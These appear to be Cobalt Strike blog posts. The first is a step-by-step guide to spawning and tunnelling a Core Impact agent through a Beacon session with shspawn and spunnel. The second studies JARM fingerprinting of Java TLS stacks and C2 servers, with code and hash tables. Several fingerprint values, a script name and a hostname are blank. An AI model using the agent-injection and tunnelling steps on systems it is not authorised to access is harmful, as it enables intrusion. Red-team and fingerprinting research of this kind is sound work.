You can also spawn a Core Impact agent from Cobalt Strike too. If Core Impact and Cobalt Strike can reach the same network, this pattern is a light way to turn an access obtained with Beacon (e.g., via phishing, lateral movement, etc.) into an Impact agent.

[Core Impact]

1. Find the Package and Register Agent module and double-click it.
2. Change ARCHITECTURE to x86-64 if you’d like to export an x64 agent
3. Change BINARY TYPE to raw
4. Change TARGET FILE to where you would like to save the file
5. Expand Agent Connection
6. Change CONNECTION METHOD and PORT to fit your preference. I find the Connect from target (reverse TCP connection) is the most performant.

[Cobalt Strike]

1. Interact with a Beacon
2. Type shspawn x64 if you exported an x64 agent. Type shspawn x86 if you exported an x86 agent.
3. Find the file that you exported.
4. Press Open.

In a few moments, you should hear that famous New Agent Deployed wav.

Tunnel Core Impact exploits through Cobalt Strike

Core Impact has an interesting offensive model. Its exploits and scans do not originate from your Core Impact GUI. The entire framework is architected to delegate offense activity through a source agent. The currently selected source agent also acts as a controller to receive connections from reverse agents [or to connect to and establish control of bind agents]. In this model, the offense process is: start with local agent, find and exploit target, set new agent as source agent, find and exploit newly visible targets, repeat until satisfied.

As the agent is the main offense actor in Core Impact, tunneling Core Impact exploits is best accomplished by tunneling the Core Impact agent through Cobalt Strike’s Beacon.

Cobalt Strike 4.2 introduced the spunnel command to spawn Core Impact’s Windows agent in a temporary process and create a localhost-only reverse port forward for it. Here are the steps to tunnel Core Impact’s agent with spunnel:

[Core Impact]

1. Click the Modules tab in the Core Impact user interface
2. Search for Package and Register Agent
3. Double-click this module
4. Change Platform to Windows
5. Change Architecture to x86-64
6. Change Binary Type to raw
7. Click Target File and press … to decide where to save the output.
8. Go to Agent Connection
9. Change Connection Method to Connect from Target
10. Change Connect Back Hostname to
11. Change Port to some value (e.g., 9000) and remember it.
12. Press OK.

[Cobalt Strike]

1. Interact with a Beacon
2. Type spunnel x64 [impact IP address] 9000 and press enter.
3. Find the file that you exported.
4. Press Open.

This is similar to passing a session from Cobalt Strike to Core Impact. The difference here is the Impact agent’s traffic is tunneled through Cobalt Strike’s Beacon payload.

What happens when Cobalt Strike’s team server is on the internet and Core Impact is on a local Windows virtual machine? We have a pattern for this too. Run a Cobalt Strike client from the same Windows system that Core Impact is installed onto. Connect this Cobalt Strike client to your team server. In this setup, run spunnel_local x64 9000 to spawn and tunnel the Impact agent through Beacon. The spunnel_local command is like spunnel, with the difference that it routes the agent traffic from Beacon to the team server and onwards through your Cobalt Strike client. The spunnel_local command was designed for this exact situation.

Next step: Request a trial

The above options are our patterns for interoperability between Core Impact and Cobalt Strike.

If you have Cobalt Strike and would like to try these patterns with Core Impact, we recommend that you request a trial of Core Impact and try it out.

A Red Teamer Plays with JARM

I spent a little time looking into Salesforce’s JARM tool released in November. JARM is an active tool to probe the TLS/SSL stack of a listening internet application and generate a hash that’s unique to that specific TLS/SSL stack.

One of the initial JARM fingerprints of interest relates to Cobalt Strike. The value associated with Cobalt Strike is:


To generate a JARM fingerprint for an application, use the JARM python tool:

python3 [target] -p [port]

I opted to dig into this, because I wanted to get a sense of whether the fingerprint is Cobalt Strike or Java.

Cobalt Strike’s JARM Fingerprint is Java’s JARM Fingerprint

I started my work with a hypothesis: Cobalt Strike’s JARM fingerprint is Java’s JARM fingerprint. To validate this, I created a simple Java SSL server application (listens on port 1234) in Sleep.


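import javax.net.ssl.*;

$factory = [SSLServerSocketFactory getDefault];
$server  = [$factory createServerSocket: 1234];
[$server setSoTimeout: 0];

# report any error raised while creating the server socket
if (checkError($error)) {
	warn($error);
}

# accept connections forever: complete the TLS handshake, then hang up
while (true) {
	$socket = [$server accept];
	[$socket startHandshake];
	[$socket close];
}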

I ran this server from Java 11 with:

java -jar sleep.jar

I assessed its JARM fingerprint as:


Interesting! This fingerprint does not match the supposed Cobalt Strike fingerprint. Does this mean we’re done? No.

The current popular use of JARM is to fingerprint web server applications listening on port 443. This implies that these servers have a certificate associated with their TLS communications. Does this change the above JARM fingerprint? Let’s set up an experiment to find out.

I generated a Java keystore with a self-signed certificate and I directed my simple server to use it:

keytool -keystore ./ -storepass 123456 -keypass 123456 -genkey -keyalg RSA -dname "CN=,OU=,O=,L=,S=,C="
java -jar sleep.jar

The JARM result:


Interesting. We’ve validated that the above JARM fingerprint is specific to a Java 11 TLS stack.

Another question: is the JARM fingerprint affected by Java version? I set up several experiments and validated that yes, different major Java versions have different JARM fingerprints in the above circumstance.
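To see where two Java versions diverge, it can help to take the fingerprints apart. The sketch below relies on the structure described in Salesforce's JARM write-up: the first 30 characters are ten 3-character codes (the cipher and TLS version the server chose for each of the ten probes, with 000 meaning the server declined that probe), and the last 32 characters are a truncated hash of the server's extensions. The two sample values are the Java 1.8.0 and Java 11.05 hashes from the table later in this post. The function names are my own and are not part of the JARM tool.

```python
# Hashes taken from the results table in this post.
JAVA_8 = "07d14d16d21d21d07c07d14d07d21d9b2f5869a6985368a9dec764186a9175"
JAVA_11 = "07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1"


def split_jarm(jarm_hash):
    """Return (probe_codes, extension_hash) for a 62-character JARM hash."""
    if len(jarm_hash) != 62:
        raise ValueError("expected a 62-character JARM hash")
    head, tail = jarm_hash[:30], jarm_hash[30:]
    # Ten probes, three characters each.
    probes = [head[i:i + 3] for i in range(0, 30, 3)]
    return probes, tail


def differing_probes(hash_a, hash_b):
    """List the 1-based probe numbers whose 3-character code differs."""
    probes_a, _ = split_jarm(hash_a)
    probes_b, _ = split_jarm(hash_b)
    return [
        number
        for number, (a, b) in enumerate(zip(probes_a, probes_b), start=1)
        if a != b
    ]


if __name__ == "__main__":
    print("Java 8 probes: ", split_jarm(JAVA_8)[0])
    print("Java 11 probes:", split_jarm(JAVA_11)[0])
    print("Probes that differ:", differing_probes(JAVA_8, JAVA_11))
```

For these two values, the first six probe codes agree and the last four do not, which is consistent with the observation that the fingerprint tracks the Java version's TLS stack.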

How many Java-native Web servers are on the internet?

Part of the value of JARM is to turn the internet haystack into something smaller for an analyst to sift through. I wanted to get a sense of how much Java is on the internet. Fortunately, this analysis was easy thanks to some timely and available data. Silas Cutler had scanned the internet for port 443 and obtained JARM values for each of these hosts. This data was made available as an SQLite database too. Counting through this data was a relatively easy exercise of:

sqlite> .open jarm.sqlite
sqlite> select COUNT(ip) FROM jarm WHERE hash = '[hash here]';
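
The same count can be scripted when there are several hashes to check. This is a minimal sketch using Python's standard sqlite3 module. It assumes only what the query above shows: a table named jarm with ip and hash columns. The demo rows are made up (documentation-range IP addresses) so that the example runs without the real scan database. To use the real data, connect to jarm.sqlite instead of the in-memory database.

```python
import sqlite3


def count_hosts(conn, jarm_hash):
    """Count rows in the jarm table whose hash column equals jarm_hash."""
    row = conn.execute(
        "SELECT COUNT(ip) FROM jarm WHERE hash = ?", (jarm_hash,)
    ).fetchone()
    return row[0]


def build_demo_db():
    """Create an in-memory stand-in for the scan database (hypothetical rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE jarm (ip TEXT, hash TEXT)")
    java_11 = "07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1"
    java_8 = "07d14d16d21d21d07c07d14d07d21d9b2f5869a6985368a9dec764186a9175"
    conn.executemany(
        "INSERT INTO jarm (ip, hash) VALUES (?, ?)",
        [
            ("192.0.2.10", java_11),
            ("192.0.2.11", java_11),
            ("192.0.2.12", java_8),
        ],
    )
    return conn


if __name__ == "__main__":
    conn = build_demo_db()  # or: sqlite3.connect("jarm.sqlite")
    target = "07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1"
    print(count_hosts(conn, target))
```

The query uses a bound parameter rather than string formatting, so a hash can be passed in from a list or a file without quoting problems.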

Here’s what I found digging through this data:

Application   Count    JARM Hash
Java 1.8.0    21,099   07d14d16d21d21d07c07d14d07d21d9b2f5869a6985368a9dec764186a9175
Java 1.9.0    9        05d14d16d04d04d05c05d14d05d04d4606ef7946105f20b303b9a05200e829
Java 11.05    2,957    07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1
Java 13.01    0        2ad2ad16d2ad2ad22c42d42d00042d58c7162162b6a603d3d90a2b76865b53

I went a step further with this data. I converted the Java 11.05 data to hostnames and eyeballed what looked interesting. I found several mail servers, though I did not investigate which application they run. I found an instance of Burp Intruder (corroborating Salesforce’s blog post). I also found several instances of Oracle PeopleSoft. These JARM hashes are a fingerprint for Java applications in general.
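
One way to put this into practice is to treat a JARM match as a hint about the TLS stack rather than about the application. The sketch below maps the four hashes from the table above to the Java versions I measured. The dictionary and function names are illustrative only, and the mapping covers nothing beyond those four values.

```python
# JARM hash -> TLS stack label, copied from the table in this post.
KNOWN_JAVA_JARM = {
    "07d14d16d21d21d07c07d14d07d21d9b2f5869a6985368a9dec764186a9175": "Java 1.8.0",
    "05d14d16d04d04d05c05d14d05d04d4606ef7946105f20b303b9a05200e829": "Java 1.9.0",
    "07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1": "Java 11.05",
    "2ad2ad16d2ad2ad22c42d42d00042d58c7162162b6a603d3d90a2b76865b53": "Java 13.01",
}


def tls_stack_hint(jarm_hash):
    """Return the Java version label for a known hash, or None if unknown.

    A match says which TLS stack answered the probes. It does not say
    which Java application is running on top of that stack.
    """
    return KNOWN_JAVA_JARM.get(jarm_hash.strip().lower())


if __name__ == "__main__":
    sample = "07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1"
    print(tls_stack_hint(sample))
```

A mail server, a proxy tool, and an enterprise web application can all return the same label here, so the result narrows the haystack without identifying the needle.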

Closing Thoughts

For defenders, I wouldn’t act on a JARM value alone as proof of application identity. For red teamers, this is a good reminder to think about proactive identification of command and control servers. This is a commoditized threat intelligence practice. If your blue team uses this type of information, there are a lot of options to protect your infrastructure. Part 3 of Red Team Operations with Cobalt Strike covers this topic starting at 1h 26m 15s:

JARM is a pretty cool way to probe a server and learn more about what it’s running. I’d love to see a database of JARM hashes and which applications they map to as a reconnaissance tool. The C2 fingerprinting is a neat application of JARM too. It’s a good reminder to keep up on your infrastructure OPSEC.